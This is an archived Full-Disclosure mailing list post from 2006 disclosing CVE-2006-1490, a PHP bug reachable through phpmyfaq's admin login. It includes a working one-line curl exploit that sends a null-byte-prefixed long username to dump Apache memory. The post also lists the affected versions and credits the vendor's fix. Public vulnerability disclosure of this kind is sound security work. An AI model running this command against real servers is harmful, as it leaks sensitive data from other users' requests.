lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
This website is powered by Openwall GNU/*/Linux security-enhanced OS
[<prev] [next>] [month] [year] [list] 
Date: Fri, 1 Dec 2006 16:57:41 +0200
From: Tonu Samuel <tonu@....ee>
To: full-disclosure@...ts.grok.org.uk
Subject: phpmyfaq exploit using PHP bug, CVE-2006-1490

Long time ago I made unneccesary noise about PHP zeroday. I expected it to be 
maybe much more dangerous that it appeared to be at end. There was lot of 
disscussions and one of main consensus was that this bug is not exploitable 
in real world because noone is using those vulnerable functions.

This bug was originally found using phpmyfaq software and wrong assumption was 
made about wideness of problem. Anyway now half year later it is time to show 
exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d 
"faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

Longer input you provide, longer memory dump you get. Works if PHP is 
unpatched AND phpmyfaq is older than 1.6.0. Memory dump you get is part of 
apache memory and often contains sensitive information from other served 
pages and contexts.

To make it clear - this is NOT fault of phpmyfaq people at all. Even more, 
they made workaround within an hour after I contacted them and urged users to 
upgrade. Just phpmyfaq appears to be one popular software which is easily 
findable by Google and this was the software where initially discovery was 
made. PHP people knew about problem but ignored for long enough to discover 
it independently from them.

   Tõnu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux